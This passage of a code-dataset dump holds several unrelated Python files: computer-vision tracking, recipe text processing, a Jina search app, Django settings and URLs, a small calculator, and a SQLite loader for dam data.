wc.recolor(color_func=img_colors)\n\tplt.imshow(wc)\n\tplt.axis(\"off\")\n\tplt.show()\n\ndef text_process(data):\n\tindustryField_text = data['industryField'].values\n\tpositionName_text = data['positionName'].values\n\t# deal_Field(industryField_text)\n\t# deal_Name(positionName_text)\n\twordcloud_Field()\n\twordcloud_Name()","sub_path":"Analysis/dealwords.py","file_name":"dealwords.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"124657713","text":"s = \"ABCDCDCD\"\nf = \"CD\"\n\n\"\"\"\nl= list(s.split())\n\nprint(l)\n\nprint(len([i for i in l if i == f]))\n\"\"\"\ncount=0\n\nfor i in range(len(s)):\n\tif s[i:i+len(f)] == f:\n\t\tcount+=1\n\n\nprint(count)\t\t\n\t\n\t\n\"\"\"best code\nstring, substring = (input().strip(), input().strip())\nprint(sum([ 1 for i in range(len(string)-len(substring)+1) if string[i:i+len(substring)] == substring]))\n\"\"\"\n\n\"\"\" another way\nlen([i for i in range(len(s)) if s[i:i+len(b)] == b])\n\"\"\"","sub_path":"18-find-a-string.py","file_name":"18-find-a-string.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"446916487","text":"'''\n * BSD 3-Clause License\n * @copyright (c) 2019, Krishna Bhatu, Hrishikesh Tawade, Kapil Rawal\n * All rights reserved.\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions are met:\n *\n * Redistributions of source code must retain the above copyright notice, this\n * list of conditions and the following 
disclaimer.\n * Redistributions in binary form must reproduce the above copyright notice,\n * this list of conditions and the following disclaimer in the documentation\n * and/or other materials provided with the distribution.\n * Neither the name of the copyright holder nor the names of its\n * contributors may be used to endorse or promote products derived from\n * this software without specific prior written permission.\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n * @file human.py\n * @author Krishna Bhatu, Hrishikesh Tawade, Kapil Rawal\n * @version 1.0\n * @brief Implemetation of Lucas-Kanade algorithm on human dataset \n *\n '''\n\nimport cv2\nimport numpy as np\nimport math\nimport glob\nimport os\n\n# Robust Error Weights\ndef getRobustError(errorVector):\n var = np.var(errorVector)\n sd = np.sqrt(var)\n mean = np.mean(errorVector)\n n,it = errorVector.shape\n q = np.zeros((n,it))\n in1,in2 = np.where(np.abs(mean - errorVector) <= var)\n q[in1,in2] = 0.5\n in3,in4 = np.where(np.abs(mean - errorVector) > var)\n q[in3,in4] = 0.05\n return q\n\n# Warp function for affine\ndef getWfromP(p):\n W = np.array([[1+p[0,0],p[0,2],p[0,4]],\n [p[0,1], 1+p[0,3],p[0,5]]])\n return W \n\n# Wrapping the image\ndef wrappingFunction(I,W,Tpoints):\n n,it = Tpoints.shape\n transformedImagePoints = np.empty([2,n])\n transformedImagePoints = np.matmul(W,Tpoints.T)\n transformedImagePoints = transformedImagePoints.T\n transformedImageIntensities = np.empty([n,1])\n transformedImageIntensities[:,0] = I[transformedImagePoints[:,1].astype(int),transformedImagePoints[:,0].astype(int)]\n \n return transformedImagePoints,transformedImageIntensities\n\n# Wrapping the gradient image\ndef wrappingFunctionOfGrad(gradientX, gradientY ,IWpoints):\n n,it = IWpoints.shape\n gradXIntensities = np.empty([n,1])\n gradYIntensities = np.empty([n,1])\n gradXIntensities[:,0] = gradientX[IWpoints[:,1].astype(int),IWpoints[:,0].astype(int)]\n gradYIntensities[:,0] = gradientY[IWpoints[:,1].astype(int),IWpoints[:,0].astype(int)]\n return gradXIntensities, gradYIntensities\n\n# Calculating change in parameters p\ndef clacChangeInParams(error, IWdx, IWdy, TPoints, weights):\n img1 = IWdx[:,0] * [TPoints[:,0]]\n img2 = IWdx[:,0] * [TPoints[:,1]]\n img3 = IWdy[:,0] * [TPoints[:,0]]\n img4 = IWdy[:,0] * [TPoints[:,1]]\n dIW = np.hstack((img1.T,img3.T,img2.T,img4.T,IWdx,IWdy))\n sumP = np.matmul(dIW.T,error * weights)\n sumHess = np.matmul(dIW.T,weights * dIW)\n sumP = np.matmul(np.linalg.pinv(sumHess), sumP)\n return sumP\n\n# LucasKanadeTracker implementation\ndef lucasKanadeTracker(Tpoints, Tintensity, I, p, startingPoint, endPoint):\n threshold = 0.07\n changeP = 100\n gradientX = cv2.Sobel(I,cv2.CV_64F,1,0,ksize=3)\n gradientY = cv2.Sobel(I,cv2.CV_64F,0,1,ksize=3)\n it = 0\n safeW,safep = 
getWfromP(p),p \n while(changeP > threshold):\n it += 1\n W = getWfromP(p)\n IWpoints, IWi = wrappingFunction(I,W,Tpoints)\n error = Tintensity - IWi\n weights = getRobustError(error)\n IWdx, IWdy = wrappingFunctionOfGrad(gradientX, gradientY ,IWpoints)\n deltaP= clacChangeInParams(error, IWdx, IWdy,Tpoints, weights)\n changeP = np.linalg.norm(deltaP)\n p[0,0] += deltaP[0,0]\n p[0,1] += deltaP[1,0]\n p[0,2] += deltaP[2,0]\n p[0,3] += deltaP[3,0]\n p[0,4] += deltaP[4,0] \n p[0,5] += deltaP[5,0]\n newStart = np.array([[startingPoint[0]],[startingPoint[1]],[1]])\n newend = np.array([[endPoint[0]],[endPoint[1]],[1]])\n s = np.matmul(W,newStart)\n e = np.matmul(W,newend)\n if (it > 300):\n return safeW,safep \n return W,p\n\n# Selecting template from the image\ndef selectRectangle(event, x, y, flags, param):\n global startingPoint, endPoint\n if event == cv2.EVENT_LBUTTONDOWN:\n startingPoint = [x,y]\n elif event == cv2.EVENT_LBUTTONUP:\n endPoint = [x,y]\n cv2.rectangle(frame11, (startingPoint[0], startingPoint[1]), (endPoint[0], endPoint[1]), (255,255,255), 2)\n cv2.imshow(\"Mark\", frame11)\n cv2.waitKey(0)\n\nglobal startingPoint, endPoint\n\n# Taking input images\nimgs = glob.glob('human/*.jpg')\n\n# Setting output folder\nfolder = 'weightedOutput'\n\n# Creating folder directory if one doesn't exits\nif not os.path.exists(folder):\n os.makedirs(folder)\n\n# Taking user input\ninp = input(\"Do you want to select the bounding box for template or use the tested bounding box for best result?('y' for Yes and 'n' for no) :\")\nif(inp == \"y\"):\n frame11 = cv2.imread(imgs[0], cv2.IMREAD_UNCHANGED)\n cv2.namedWindow(\"Mark\")\n cv2.setMouseCallback(\"Mark\", selectRectangle)\n cv2.imshow(\"Mark\", frame11)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\nelse:\n startingPoint = [263,291]\n endPoint = [282,359]\n\n# Converting to gray\nframe1 = cv2.imread(imgs[0], 0)\n\nh1 = abs(startingPoint[1] - endPoint[1])\nw1 = abs(startingPoint[0] - endPoint[0])\nframe1Points = np.empty([h1*w1,3])\nn = 0\n\n# Getting frames points\nfor i in range(startingPoint[0],endPoint[0]):\n for j in range(startingPoint[1],endPoint[1]):\n frame1Points[n,0] = i\n frame1Points[n,1] = j\n frame1Points[n,2] = 1\n n+=1\n\nframe1Intensities = np.empty([h1*w1, 1])\nn = 0\n# Setting new points with intensity from image\nfor i in frame1Points:\n frame1Intensities[n,0] = frame1[int(i[1]),int(i[0])]\n n += 1\n\np = np.zeros([1,6], dtype = np.float)\nframesSeen = 0\nit = 0\n\n# Main loop for all image sequence\nfor img in imgs: \n\n frame1c = cv2.imread(img)\n frame2 = cv2.imread(img, 0)\n frame2 = frame2.astype(float)\n\n # LucasKanadeTracker\n updatedParam,p = lucasKanadeTracker(frame1Points, frame1Intensities, frame2, p, startingPoint, endPoint)\n \n # Updating boundary points\n newstartPoint = np.array([[startingPoint[0]],[startingPoint[1]], [1]])\n newendPoint = np.array([[endPoint[0]],[endPoint[1]], [1]])\n newStart = np.matmul(updatedParam, newstartPoint)\n newEnd = np.matmul(updatedParam, newendPoint)\n newstartrigth = np.array([[startingPoint[0]],[endPoint[1]], [1]])\n newstartleft = np.array([[endPoint[0]],[startingPoint[1]], [1]])\n newStartrigth = np.matmul(updatedParam, newstartrigth)\n newStartleft = np.matmul(updatedParam, newstartleft)\n print(it)\n framesSeen += 1\n if(framesSeen == 1000):\n p = np.zeros([1,6], dtype = np.float)\n startingPoint[0], startingPoint[1] = int(newStart[0]), int (newStart[1])\n endPoint[0], endPoint[1] = int(newEnd[0]), int(newEnd[1])\n h1 = abs(startingPoint[1] - endPoint[1])\n w1 = 
abs(startingPoint[0] - endPoint[0])\n frame1Points = np.empty([h1*w1,3])\n n = 0\n for i in range(startingPoint[0],endPoint[0]):\n for j in range(startingPoint[1],endPoint[1]):\n frame1Points[n,0] = i\n frame1Points[n,1] = j\n frame1Points[n,2] = 1\n n+=1\n\n frame1Intensities = np.empty([h1*w1, 1])\n n = 0\n for i in frame1Points:\n frame1Intensities[n,0] = frame1[int(i[1]),int(i[0])]\n n += 1\n framesSeen = 0\n\n # Creating bounding box\n cv2.line(frame1c, (newStart[0],newStart[1]), (newStartrigth[0], newStartrigth[1]), (0,0,255),2)\n cv2.line(frame1c, (newStart[0],newStart[1]), (newStartleft[0], newStartleft[1]), (0,0,255),2)\n cv2.line(frame1c, (newStartleft[0], newStartleft[1]), (newEnd[0], newEnd[1]), (0,0,255),2)\n cv2.line(frame1c, (newStartrigth[0], newStartrigth[1]), (newEnd[0], newEnd[1]), (0,0,255),2)\n \n cv2.imshow(\"Frameaa\", frame1c)\n cv2.waitKey(1)\n\n # Writing the image\n cv2.imwrite(folder + '/' + img, frame1c)\n it += 1\n\nprint('All frames processed')\nprint('\\nPress \\'q\\' to destroy window')\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"src/weightedHuman.py","file_name":"weightedHuman.py","file_ext":"py","file_size_in_byte":8991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"181572378","text":"import unittest\n\nhumidity_values = [-300, 30, 50, 100]\n\n\nclass Measure_Humidity(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_noclamp(self):\n from senseo.exception import MaxLimitException, MinLimitException\n from senseo.measure.humidity import Humidity\n for value in humidity_values:\n def newHumidity(v):\n return Humidity(v, clamp=False)\n print('Humidity.min: %s' % Humidity.min)\n print('Humidity.max: %s' % Humidity.max)\n print('Value: %s' % value)\n if value < Humidity.min:\n self.assertRaises(MinLimitException, newHumidity, (value))\n elif value > Humidity.max:\n self.assertRaises(MaxLimitException, newHumidity, (value))\n else:\n h = newHumidity(value)\n self.assertEqual(value, h.value())\n\n def test_clamp(self):\n from senseo.measure.humidity import Humidity\n for value in humidity_values:\n def newHumidity(v):\n return Humidity(v)\n print('Humidity.min: %s' % Humidity.min)\n print('Humidity.max: %s' % Humidity.max)\n h = newHumidity(value)\n print('Value in: %s out: %s' % (value, h.value()))\n if value < h.min:\n self.assertEqual(h.value(), h.min)\n elif value > h.max:\n self.assertEqual(h.value(), h.max)\n else:\n h = newHumidity(value)\n self.assertEqual(value, h.value())\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"senseo/test/measure_humidity.py","file_name":"measure_humidity.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"512353178","text":"import pandas as pd\nimport re\nimport collections\nfrom nltk.tokenize import RegexpTokenizer\nimport spacy\n\n\ndef load_data(filename):\n recipes_df = pd.read_csv(filename, header=None, usecols=[\n 0, 1, 2, 5], names=['id', 'name', 'ingredients', 'category_id'])\n\n def replace(x):\n res = x.copy()\n if x.isna()['ingredients']:\n res['ingredients'] = x['name']\n return res\n\n recipes_df = recipes_df.apply(replace, axis=1)\n return recipes_df\n\n\ndef build_corpus(recipes_df):\n corpus = {}\n for recipe in enumerate(recipes_df.itertuples()):\n corpus[recipe[1].id] = []\n ingredients = recipe[1].ingredients.split(',')\n for ingredient in ingredients:\n numbers_list = re.findall(r'[0-9]+', ingredient)\n numbers_list 
+= ['-', '/', ',', '(', ')', \"'\"]\n            for nbr in numbers_list:\n                ingredient = ingredient.replace(nbr, ' ')\n            ingredient = ingredient.strip()\n            corpus[recipe[1].id] += ingredient.split(' ')\n    return corpus\n\n\ndef recipe_tokenize(recipe):\n    if type(recipe) != str:\n        raise Exception(\"The function takes a string as input data\")\n    else:\n        tokenizer = RegexpTokenizer(r'(\\w+)')\n        tokens = tokenizer.tokenize(recipe)\n        filt_tokens = []\n        for token in tokens:\n            if not re.match(r'.*\\d+.*', token):\n                filt_tokens.append(token)\n        return filt_tokens\n\n\ndef build_collection_from_df(recipes_df):\n    corpus = {}\n    for recipe in enumerate(recipes_df.itertuples()):\n        corpus[recipe[1].id] = recipe_tokenize(recipe[1].ingredients)\n    return corpus\n\n\ndef count_frequency(collection):\n    tokens_count = collections.Counter()\n    for key in collection.keys():\n        count = collections.Counter(collection[key])\n        tokens_count.update(count)\n    return tokens_count\n\n\ndef n_most_common_tokens(collection, n):\n    tokens_count = count_frequency(collection)\n    n_most_common_tokens = tokens_count.most_common(n)\n    return n_most_common_tokens\n\n\nSTOP_WORDS = ['DE', 'G', 'AUX', 'À', 'CUIL',\n              'SOUPE', 'D', 'CL', 'OU', 'DU',\n              'MON', 'AU', 'DES', 'LE', 'LES',\n              'LA', 'EN', 'KG', 'POUR', 'ET', 'LIVRE', 'L', 'RECETTE']\n\n# Function to filter stop words out of the collection\n\n\ndef remove_stop_words(collection, stop_word_file):\n    collection_filtered = {}\n    for i in collection:\n        collection_filtered[i] = []\n        for j in collection[i]:\n            if j not in stop_word_file:\n                collection_filtered[i].append(j)\n    return collection_filtered\n\n\ndef collection_lemmatize(collection):\n    collection_lemmatized = {}\n    nlp = spacy.load('fr_core_news_md')\n    for i in collection:\n        collection_lemmatized[i] = []\n        for j in collection[i]:\n            ingredients = nlp(j)\n            for token in ingredients:\n                collection_lemmatized[i].append(token.lemma_.upper())\n    return collection_lemmatized\n\n\ndef pre_process_collection(collection):\n    lemmatized_collection = collection_lemmatize(collection)\n    return remove_stop_words(lemmatized_collection, STOP_WORDS)\n\n\ndef get_pre_processed_collection(filename):\n    recipes_df = load_data(filename)\n    collection = build_collection_from_df(recipes_df)\n    return pre_process_collection(collection)\n\n\ndef get_term_weigth(document_id, term, recipes_df):\n    step_list = recipes_df[recipes_df.id == document_id]['ingredients'].reset_index()[\n        'ingredients'][0]\n    step_list = step_list.split(',')\n    for pos, ingredients in enumerate(step_list):\n        if re.findall(term, ingredients.upper()):\n            return weigth_function(pos)\n    return 0\n\n\ndef weigth_function(pos, ratio=1.2, first_val=1):\n    return (1/ratio)**(pos)*first_val\n","sub_path":"utils/collection_processing.py","file_name":"collection_processing.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"345084980","text":"import os\nimport sys\nimport click\nimport random\nfrom jina import Flow, Document, DocumentArray\nfrom jina.logging.predefined import default_logger as logger\n\nMAX_DOCS = int(os.environ.get('JINA_MAX_DOCS', 10000))\nJINA_PORT = str(45678)\ncur_dir = os.path.dirname(os.path.abspath(__file__))\nJINA_WORKSPACE = os.path.join(cur_dir, 'workspace')\ndef config():\n    os.environ['JINA_DATA_FILE'] = os.environ.get('JINA_DATA_FILE', 'data.txt')\n    os.environ['JINA_PORT'] = os.environ.get('JINA_PORT', JINA_PORT)\n    cur_dir = os.path.dirname(os.path.abspath(__file__))\n    
os.environ.setdefault('JINA_WORKSPACE', os.path.join(os.path.join(cur_dir, 'jina-text'), 'workspace'))\n os.environ.setdefault('JINA_WORKSPACE_MOUNT',\n f'{os.environ.get(\"JINA_WORKSPACE\")}:/workspace/workspace')\n\n\n\ndef input_generator(num_docs: int, file_path: str):\n with open(file_path) as file:\n lines = file.readlines()\n num_lines = len(lines)\n random.shuffle(lines)\n for i in range(min(num_docs, num_lines)):\n yield Document(text=lines[i])\n\n\ndef index(num_docs):\n flow = Flow().load_config('flows/flow.yml')\n data_path = os.path.join(os.path.dirname(__file__), os.environ.get('JINA_DATA_FILE', None))\n with flow:\n flow.post(on='/index', inputs=input_generator(num_docs, data_path),\n show_progress=True)\ndef query_restful():\n flow = Flow.load_config('flows/flow.yml')\n flow.protocol = 'http'\n flow.port_expose = JINA_PORT \n with flow:\n flow.block()\n\n# def remove_workspace():\n# import subprocess\n# subprocess.run(f'cmd.exe /c start cmd.exe /c wsl.exe rm -R {JINA_WORKSPACE}', shell= True,timeout=10000)\n\n\n@click.command()\n@click.option(\n '--task',\n '-t',\n type=click.Choice(['index', 'query'], case_sensitive=False),\n)\n@click.option('--num_docs', '-n', default=MAX_DOCS)\n@click.option('--top_k', '-k', default=5)\ndef main(task, num_docs, top_k):\n config()\n if task == 'index':\n if os.path.exists(os.environ.get(\"JINA_WORKSPACE\")):\n logger.error(f'\\n +---------------------------------------------------------------------------------+ \\\n \\n | 🤖🤖🤖 | \\\n \\n | The directory {os.environ.get(\"JINA_WORKSPACE\")} already exists. Please remove it before indexing again. | \\\n \\n | 🤖🤖🤖 | \\\n \\n +---------------------------------------------------------------------------------+')\n sys.exit(1)\n index(num_docs)\n if task == 'query':\n query_restful()\n # if task == 'del':\n # remove_workspace()\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Backend/jina-text/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"338124186","text":"from . import views\nfrom django.urls import path,include\n\nurlpatterns = [\n path('',views.home,name='home' ),\n path('observation/',views.observation,name='observation' ),\n path('encounter/',views.encounter,name='encounter' ),\n path('jsonviewPatient//',views.jsonviewPatient, name='jsonviewPatient' ),\n path('jsonviewObservation//', views.jsonviewObservation, name='jsonviewObservation'),\n path('jsonviewEncounter//', views.jsonviewEncounter, name='jsonviewEncounter'),\n path('url/', views.url, name='url'),\n\n]","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"281844891","text":"# File : encircle_project.py\n# Programmer : Shakti Singla\n# Description : Program that acts as a simple calculator. 
Takes a single argument\n# as an expression and prints out the integer result of evaluating it.\n# There is no explicit limit in code to how deep expressions can be\n\nimport sys\n\ndef main_loop():\n \n try:\n expression = get_expression()\n if expression == 'exit' or expression == 'EXIT': # checking user input\n exit()\n solving(expression)\n\n except:\n print(\"Please Enter the Expression properly\") # Warning Message\n\n\n# Getting the expression from User\ndef get_expression():\n expression = sys.argv[1]\n return expression\n\n\n# Solving the expression\ndef solving(expression):\n while True: # Looping through all the brackets until we have only integer value left\n if expression.isnumeric() == False: # If expression is not only a single number\n a = expression[::-1].find('(')\n index1 = len(expression) - a - 1 # Solving from inner pair of round brackets while moving to outer ones\n b = expression[index1:].find(')') + index1\n index2 = b + 1 \n formatted_expression = formatting(expression[index1:index2])\n list1 = splitting(formatted_expression)\n answer = calculate(list1)\n expression = expression.replace(expression[index1:index2], str(answer))\n else:\n print(expression)\n break\n\n\n# Taking the expression out of the round brackets\ndef formatting(expression):\n expression = expression.replace(\"(\", \"\")\n expression = expression.replace(\")\", \"\")\n return expression\n\n\n# Splitting the expression and storing in a list\ndef splitting(expression):\n list1 = expression.split(\" \") # Creating list of one expression inside the round brackets\n return list1\n\n\n# Solving the arithmetic part of the expression\n# Support an arbitrary number of arguments to add and multiply\ndef calculate(list1):\n if list1[0] == \"ADD\" or list1[0] == \"add\":\n answer = 0\n for i in range(1, len(list1)): #\n answer = answer + int(list1[i])\n return answer\n elif list1[0] == \"MULTIPLY\" or list1[0] == \"multiply\":\n answer = 1\n for i in range(1, len(list1)):\n answer *= int(list1[i])\n return answer\n # We can can use more elif statements for other operands\n # like (*, /, etc..)\n # Need to take care of 0 in case of Division\n\nmain_loop()\n","sub_path":"encircle_project 2.py","file_name":"encircle_project 2.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"190738918","text":"import sys, os\nfrom MetaDB import MetaDB\nfrom MetaDBExtension import MetaDBExtension\nimport getopt\nfrom sd_common import *\nfrom display_info import display_info\n\ndryrun = False\nverbose = False\n\ndef usage():\n\tusageinfo = ' Usage: python3 job_status.py [-t | -p ] [-r ] -d [-n -v]'\\\n\t\t\t\t+ \"\\n\\t-t => db1.tn1,db2.tn2... 
OR -p pid1,pid2...\"\\\n\t\t\t\t+ \"\\n\\t-d => target name\"\\\n\t\t\t\t+ \"\\n\\t-r => num records to display\"\\\n\t\t\t\t+ \"\\n\\t-o => order rows by [sub, pub]\"\\\n\t\t\t\t+ \"\\n\\t-v => verbose\"\\\n\t\t\t\t+ \"\\n\\t-n => dryrun mode\"\\\n\t\t\t\t+ \"\\nREFERENCE: https://confluence.paypal.com/display/PPDM/SD+Job+management+Utilities\"\n\tprint (usageinfo)\n\ndef process_args(args):\n\tglobal dryrun, verbose\n\ttry:\n\t\toptlist, args = getopt.getopt(args, 'vnt:p:r:d:o:')\n\texcept getopt.GetoptError: \n\t\tusage() \n\t\tsys.exit(2)\n\n\tnum_records = 20 # Default num to select\n\ttname_list = []\n\tpublishid_list = []\n\ttarg_list = ['all'] # Default all targets\n\torder_by = 'pub'\n\n\tfor (o, a) in optlist:\n\t\tif o == \"-t\" and len(tname_list) == 0:\n\t\t\ttname_list = [t for t in a.split(',')]\n\t\telif o == \"-p\" and len(publishid_list) == 0:\n\t\t\tpublishid_list = [int(pid) for pid in a.split(',')]\n\t\telif o == \"-r\":\n\t\t\tnum_records = a\n\t\telif o == \"-d\":\n\t\t\ttarg_list = a.split(\",\")\n\t\telif o == \"-n\":\n\t\t\tdryrun = True\n\t\t\tverbose = True\n\t\telif o == \"-v\":\n\t\t\tverbose = True\n\t\telif o == \"-o\":\n\t\t\tif a in ['pub', 'sub']:\n\t\t\t\torder_by = a\n\n\tif (len(tname_list) == 0 and len(publishid_list) == 0) or (len(targ_list) == 0):\n\t\tusage() \n\t\tsys.exit(2)\n\treturn (publishid_list, tname_list, num_records, targ_list, order_by)\n\t\n\t\nif __name__ == '__main__':\n\n\t(publishid_list, tname_list, num_records, targ_list, order_by) = process_args(sys.argv[1:])\n\tmdb = MetaDBExtension(os.path.basename(__file__))\n\n\tif len(publishid_list) == 0:\n\t\tpublishid_list = [find_publishid(mdb, tname) for tname in tname_list]\n\n\tfor publishid in publishid_list:\n\t\ttname = find_tname(mdb, publishid)\n\t\tif publishid < 0:\n\t\t\tmdb.close()\n\t\t\tsys.exit(\"Given table doesn't exist\")\n\n\t\tif (targ_list[0]) == 'all':\n\t\t\tactual_targ_list = find_active_targets(mdb, publishid)\n\t\t\tif len(actual_targ_list) == 0:\n\t\t\t\tsys.exit(\"No replication happening to targets for given publishid {p}\".format(p=publishid))\n\t\telse:\n\t\t\tactual_targ_list = targ_list\n\t\t\tfor targ in actual_targ_list:\n\t\t\t\tif not validate_syncsystem_name(mdb, targ):\n\t\t\t\t\tsys.exit('Not a valid syncsystem name: {name}'.format(name=targ))\n\n\t\t(updt_stgy, schedule_id) = mdb.select(\"select UpdateStrategy, scheduleId from syncpublish where publishid={p}\".format(p=publishid))[0]\n\n\t\tif order_by == 'pub':\n\t\t\tquery = \"check_job_status\"\n\t\telif order_by == 'sub':\n\t\t\tquery = \"check_job_status_orderby_target\"\n\n\t\tcheck_job_status_query = get_query(mdb, query).format(pid=publishid, rownum=num_records, targ_list=\",\".join([quote_str(t) for t in actual_targ_list]))\n\t\tprint(\"\\nPublishid:{p}\\tTableName={t}\\tUpdateStrategy={u}\\tscheduleId={s}\\ttargets:{targ}\"\\\n\t\t\t\t.format(p=publishid, t=tname, u=updt_stgy, s=schedule_id, targ=\",\".join(actual_targ_list)))\n\t\tverbose and print (\"Executing query:\\n{q}\\n\".format(q=check_job_status_query))\n\t\tdryrun or display_info(mdb, check_job_status_query)\n\t\tdryrun or log_audit_info(mdb, check_job_status_query, os.path.basename(__file__))\n\n\tmdb.close()\n","sub_path":"projects/steam_donkey/py/modules/job_management_utils/job_status.py","file_name":"job_status.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"86095444","text":"from .common import *\nDEBUG = 
True\nALLOWED_HOSTS = ['*']\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'pi-dal.db'),\n }\n}\nSECRET_KEY = '__8)+a)-nc_fwmz948eyv&n7l2uw-r70bb8q%@m_4f=y^9#der'\n\n","sub_path":"dal/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"459735070","text":"import sqlite3\nimport pandas as pd\nimport numpy as np\n\ndef bool2int(x):\n \"\"\"Convert a boolean value to an integer,if it\n is a bool. Else, return the original value.\"\"\"\n test = isinstance(x, (bool, np.bool_))\n if test:\n return int(x)\n else:\n return x\n\ndams_loc = pd.read_pickle('dams_df.pkl')\ndams_state = pd.read_pickle('dams_state.pkl')\n\nconn = sqlite3.connect(\"data/dams.db\")\ncursor = conn.cursor()\n\n# Create the table that will store the dam locations\nlocs_tbl = \"\"\"CREATE TABLE locations (\n Name VARCHAR(30) PRIMARY KEY NOT NULL,\n x REAL NOT NULL,\n y REAL NOT NULL\n )\"\"\"\ncursor.execute(locs_tbl)\n\n# populate the table with date from dams_loc\nloc_insert = \"\"\"INSERT OR REPLACE INTO locations (Name, x, y) VALUES (?,?,?)\"\"\"\ncursor.executemany(loc_insert, dams_loc.to_records(index=False))\n\n# Create the table that will store the state of dams\nstate_tbl = \"\"\"CREATE TABLE state (\n ID INTEGER PRIMARY KEY,\n Region VARCHAR(2) NOT NULL,\n Date VARCHAR(10) NOT NULL,\n Name VARCHAR(30) NOT NULL,\n River VARCHAR(30) NOT NULL,\n FSC REAL,\n This_week REAL,\n This_week_lda INT(1),\n Last_week REAL,\n Last_week_lda INT(1),\n Last_year REAL,\n Last_year_lda INT(1),\n FOREIGN KEY(Name) REFERENCES locations(Name)\n )\"\"\"\ncursor.execute(state_tbl)\n\n# Convert the boolean to and integer and the date to string\ndams_state = dams_state.applymap(lambda x: bool2int(x))\ndams_state.Date = dams_state.Date.map(lambda x: str(x))\n\n# populate the table with date from dams_state\nstate_insert = \"\"\"INSERT OR REPLACE INTO state\n (ID, Region, Date, Name, River, FSC,\n This_week, This_week_lda,\n Last_week, Last_week_lda,\n Last_year, Last_year_lda) VALUES (NULL, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);\"\"\"\ncursor.executemany(state_insert, dams_state.to_records(index=False))\n\nconn.commit()\ncursor.close()\nconn.close()\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"537407213","text":"#http://docs.opencv.org/3.1.0/d0/d86/tutorial_py_image_arithmetics.html\n#Code to pick up only outline of OpenCV Logo and add it to Messi5 image\n\nimport sys\nsys.path.append('/usr/local/lib/python2.7/site-packages')\n\n\nimport cv2\nimport numpy as np\n\n# Load two images\n\nimg1 = cv2.imread('/Users/sanketjain/Documents/OpenCV/02 Core Operations/Arithmetic Operations on Images/sanket.jpg')\nimg2 = cv2.imread('/Users/sanketjain/Documents/OpenCV/02 Core Operations/Arithmetic Operations on Images/opencvlogo.png')\nimg3 = cv2.imread('/Users/sanketjain/Documents/OpenCV/02 Core Operations/Arithmetic Operations on Images/BalloonImages.jpg')\n\n\n\n# I want to put logo on top-left corner, So I create a ROI\nrows,cols,channels = img2.shape\nroi = img1[0:rows, 0:cols ]\n\n# Now create a mask of logo and create its inverse mask also\nimg2gray = cv2.cvtColor(img2,cv2.COLOR_BGR2GRAY)\nret, mask = cv2.threshold(img2gray, 10, 255, cv2.THRESH_BINARY)\n# 
